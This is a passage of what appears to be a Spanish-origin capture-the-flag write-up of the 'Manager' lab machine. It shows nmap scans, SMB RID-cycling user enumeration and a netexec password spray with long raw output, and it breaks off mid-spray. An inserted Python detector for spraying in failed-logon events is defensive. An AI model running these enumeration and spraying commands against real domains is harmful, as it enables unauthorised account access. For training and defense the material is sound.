Manager

Skills

  • SMB Enumeration
  • User Enumeration - RID Cycling Attack (Netexec)
  • Ldap Enumeration (ldapdomaindump)
  • Credentials Brute Force (CrackMapExec)
  • MSSQL Enumeration (mssqlclient.py)
  • Abusing MSSQL (xp_dirtree)
  • Information Leakage
  • Abusing WinRM to get an interactive console
  • DC Enumeration (adPEAS) - Powershell tool to automate Active Directory enumeration
  • Abusing Active Directory Certificate Services (ADCS)
  • ESC7 exploitation case with certipy [Privilege Escalation]

Certifications

  • OSCP
  • OSEP
  • eCPPTv3

Description

Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. The xp_dirtree procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation.


Reconnaissance

We check that the machine is up and identify its operating system. The TTL of Windows machines is usually 128; in this case there is an intermediate node that lowers the TTL by one.

# ping 10.129.160.212
PING 10.129.160.212 (10.129.160.212) 56(84) bytes of data.
64 bytes from 10.129.160.212: icmp_seq=1 ttl=127 time=36.1 ms
64 bytes from 10.129.160.212: icmp_seq=2 ttl=127 time=36.3 ms
64 bytes from 10.129.160.212: icmp_seq=3 ttl=127 time=36.3 ms
^C
--- 10.129.160.212 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 36.098/36.241/36.324/0.101 ms

Nmap

A scan of all open TCP ports is performed with nmap.

# sudo nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.160.212 -oG openPorts
[sudo] password for justice-reaper: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 19:28 CEST
Initiating SYN Stealth Scan at 19:28
Scanning 10.129.160.212 [65535 ports]
Discovered open port 139/tcp on 10.129.160.212
Discovered open port 80/tcp on 10.129.160.212
Discovered open port 445/tcp on 10.129.160.212
Discovered open port 135/tcp on 10.129.160.212
Discovered open port 53/tcp on 10.129.160.212
Discovered open port 49687/tcp on 10.129.160.212
Discovered open port 49720/tcp on 10.129.160.212
Discovered open port 3268/tcp on 10.129.160.212
Discovered open port 3269/tcp on 10.129.160.212
Discovered open port 49730/tcp on 10.129.160.212
Discovered open port 49686/tcp on 10.129.160.212
Discovered open port 464/tcp on 10.129.160.212
Discovered open port 49685/tcp on 10.129.160.212
Discovered open port 636/tcp on 10.129.160.212
Discovered open port 49763/tcp on 10.129.160.212
Discovered open port 593/tcp on 10.129.160.212
Discovered open port 1433/tcp on 10.129.160.212
Discovered open port 49667/tcp on 10.129.160.212
Discovered open port 5985/tcp on 10.129.160.212
Discovered open port 9389/tcp on 10.129.160.212
Discovered open port 389/tcp on 10.129.160.212
Discovered open port 88/tcp on 10.129.160.212
Completed SYN Stealth Scan at 19:28, 39.63s elapsed (65535 total ports)
Nmap scan report for 10.129.160.212
Host is up (0.051s latency).
Not shown: 65513 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49685/tcp open  unknown
49686/tcp open  unknown
49687/tcp open  unknown
49720/tcp open  unknown
49730/tcp open  unknown
49763/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 39.69 seconds
           Raw packets sent: 196581 (8.650MB) | Rcvd: 42 (1.848KB)

Next, service detection and version identification are run against the open ports found.

# nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49685,49686,49687,49720,49730,49763 10.129.160.212 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 19:29 CEST
Nmap scan report for 10.129.160.212
Host is up (0.086s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Manager
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-13 00:29:26Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-13T00:30:56+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-13T00:30:57+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-09-13T00:30:56+00:00; +7h00m00s from scanner time.
| ms-sql-info: 
|   10.129.160.212:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.129.160.212:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-13T00:26:26
|_Not valid after:  2054-09-13T00:26:26
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-13T00:30:56+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
|_ssl-date: 2024-09-13T00:30:57+00:00; +7h00m00s from scanner time.
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     mc-nmf        .NET Message Framing
49667/tcp open     msrpc         Microsoft Windows RPC
49685/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open     msrpc         Microsoft Windows RPC
49687/tcp open     msrpc         Microsoft Windows RPC
49720/tcp open     msrpc         Microsoft Windows RPC
49730/tcp filtered unknown
49763/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time: 
|   date: 2024-09-13T00:30:20
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.42 seconds

SMB Enumeration

We obtain the machine name and the domain.

# netexec smb 10.129.160.212                           
SMB         10.129.160.212  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)

We add the domain to /etc/hosts.

127.0.0.1   localhost
127.0.1.1   kali-linux
10.129.160.212  dc01 dc01.manager.htb manager.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

We enumerate the SMB shares. I tried to connect with smbclient, but it does not let me run commands.

# netexec smb 10.129.160.212 -u 'guest' -p '' --shares 
SMB         10.129.160.212  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.160.212  445    DC01             [+] manager.htb\guest: 
SMB         10.129.160.212  445    DC01             [*] Enumerated shares
SMB         10.129.160.212  445    DC01             Share           Permissions     Remark
SMB         10.129.160.212  445    DC01             -----           -----------     ------
SMB         10.129.160.212  445    DC01             ADMIN$                          Remote Admin
SMB         10.129.160.212  445    DC01             C$                              Default share
SMB         10.129.160.212  445    DC01             IPC$            READ            Remote IPC
SMB         10.129.160.212  445    DC01             NETLOGON                        Logon server share 
SMB         10.129.160.212  445    DC01             SYSVOL                          Logon server share 

We enumerate users by brute-forcing the RID.

# netexec smb 10.129.160.212 -u 'guest' -p '' --rid-brute        
SMB         10.129.160.212  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.160.212  445    DC01             [+] manager.htb\guest: 
SMB         10.129.160.212  445    DC01             498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.160.212  445    DC01             500: MANAGER\Administrator (SidTypeUser)
SMB         10.129.160.212  445    DC01             501: MANAGER\Guest (SidTypeUser)
SMB         10.129.160.212  445    DC01             502: MANAGER\krbtgt (SidTypeUser)
SMB         10.129.160.212  445    DC01             512: MANAGER\Domain Admins (SidTypeGroup)
SMB         10.129.160.212  445    DC01             513: MANAGER\Domain Users (SidTypeGroup)
SMB         10.129.160.212  445    DC01             514: MANAGER\Domain Guests (SidTypeGroup)
SMB         10.129.160.212  445    DC01             515: MANAGER\Domain Computers (SidTypeGroup)
SMB         10.129.160.212  445    DC01             516: MANAGER\Domain Controllers (SidTypeGroup)
SMB         10.129.160.212  445    DC01             517: MANAGER\Cert Publishers (SidTypeAlias)
SMB         10.129.160.212  445    DC01             518: MANAGER\Schema Admins (SidTypeGroup)
SMB         10.129.160.212  445    DC01             519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB         10.129.160.212  445    DC01             520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.160.212  445    DC01             521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.160.212  445    DC01             522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.160.212  445    DC01             525: MANAGER\Protected Users (SidTypeGroup)
SMB         10.129.160.212  445    DC01             526: MANAGER\Key Admins (SidTypeGroup)
SMB         10.129.160.212  445    DC01             527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.160.212  445    DC01             553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.160.212  445    DC01             571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.160.212  445    DC01             572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.160.212  445    DC01             1000: MANAGER\DC01$ (SidTypeUser)
SMB         10.129.160.212  445    DC01             1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB         10.129.160.212  445    DC01             1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.160.212  445    DC01             1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB         10.129.160.212  445    DC01             1113: MANAGER\Zhong (SidTypeUser)
SMB         10.129.160.212  445    DC01             1114: MANAGER\Cheng (SidTypeUser)
SMB         10.129.160.212  445    DC01             1115: MANAGER\Ryan (SidTypeUser)
SMB         10.129.160.212  445    DC01             1116: MANAGER\Raven (SidTypeUser)
SMB         10.129.160.212  445    DC01             1117: MANAGER\JinWoo (SidTypeUser)
SMB         10.129.160.212  445    DC01             1118: MANAGER\ChinHae (SidTypeUser)
SMB         10.129.160.212  445    DC01             1119: MANAGER\Operator (SidTypeUser)

We create a wordlist with these users. It is important that the names also appear with the first letter in lowercase and with the whole name in uppercase. The username is case-insensitive, but the password is not, so we need to have all the possible combinations. I used this website to convert the names to their different forms: https://mayusculasminusculas.com/

Zhong   
Cheng   
Ryan    
Raven   
JinWoo  
ChinHae
Operator
zhong   
cheng   
ryan    
raven   
jinWoo  
chinHae
operator
ZHONG   
CHENG   
RYAN    
RAVEN   
JINWOO  
CHINHAE
OPERATOR
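
Seen from the domain controller, the three spellings of each name in this list are one account, so every password tried with this list produces three failed logons per account. The following is an added example (not part of the original write-up) of detection logic that folds case before counting distinct accounts per source over failed-logon events (Event ID 4625); the JSON-lines export format, the source addresses and the thresholds are assumptions, and the sample events are constructed.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

WRONG_PASSWORD = "0xc000006a"  # 4625 SubStatus: account exists, password is wrong


def parse_events(lines):
    """Yield (time, source_ip, account) for failed logons caused by a bad password."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4625:
            continue
        if ev.get("SubStatus", "").lower() != WRONG_PASSWORD:
            continue
        # AD account names are case-insensitive: Zhong, zhong and ZHONG are
        # the same account, so fold case before counting.
        account = ev["TargetUserName"].casefold()
        yield datetime.fromisoformat(ev["TimeCreated"]), ev["IpAddress"], account


def detect_spray(lines, min_accounts=5, window=timedelta(minutes=5)):
    """Flag sources that fail against >= min_accounts distinct accounts in one window.

    Returns {source_ip: {"accounts": [...], "failures": {account: count}}}.
    "failures" counts every failed logon from that source, per real account.
    """
    by_source = defaultdict(list)
    for ts, ip, account in parse_events(lines):
        by_source[ip].append((ts, account))

    findings = {}
    for ip, events in by_source.items():
        events.sort()
        start, best = 0, set()
        for end in range(len(events)):
            # Slide the window start forward until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            seen = {acct for _, acct in events[start:end + 1]}
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_accounts:
            failures = defaultdict(int)
            for _, acct in events:
                failures[acct] += 1
            findings[ip] = {"accounts": sorted(best), "failures": dict(failures)}
    return findings


def build_sample():
    """Constructed sample: one password tried against the 21-entry list above,
    plus one user mistyping a password twice from another host."""
    names = ["Zhong", "Cheng", "Ryan", "Raven", "JinWoo", "ChinHae", "Operator"]
    spellings = names + [n[0].lower() + n[1:] for n in names] + [n.upper() for n in names]
    t0 = datetime(2024, 9, 12, 19, 40, 0)
    lines = []
    for i, user in enumerate(spellings):
        lines.append(json.dumps({
            "EventID": 4625,
            "TimeCreated": (t0 + timedelta(seconds=i)).isoformat(),
            "IpAddress": "192.0.2.10",      # constructed source address
            "TargetUserName": user,
            "SubStatus": "0xC000006A",
        }))
    for i in range(2):
        lines.append(json.dumps({
            "EventID": 4625,
            "TimeCreated": (t0 + timedelta(minutes=1, seconds=i)).isoformat(),
            "IpAddress": "192.0.2.77",      # constructed benign workstation
            "TargetUserName": "Ryan",
            "SubStatus": "0xC000006A",
        }))
    return lines


if __name__ == "__main__":
    for ip, info in detect_spray(build_sample()).items():
        print(ip, "failed against", len(info["accounts"]), "accounts")
        for account, count in sorted(info["failures"].items()):
            print(f"  {account}: {count} failed logons")
```

The per-account count is the number an account lockout threshold compares against, which is why the detector reports it per real account rather than per spelling.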

We brute-force valid credentials and find operator:operator.

# netexec smb 10.129.160.212 -u users -p users                      
SMB         10.129.160.212  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:Zhong STATUS_LOGON_FAILURE 
^CSMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:Zhong STATUS_LOGON_FAILURE 
^C^C

# netexec smb 10.129.160.212 -u users -p users --continue-on-succes
SMB         10.129.160.212  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:ChinHae STATUS_LOGON_FAILURE 
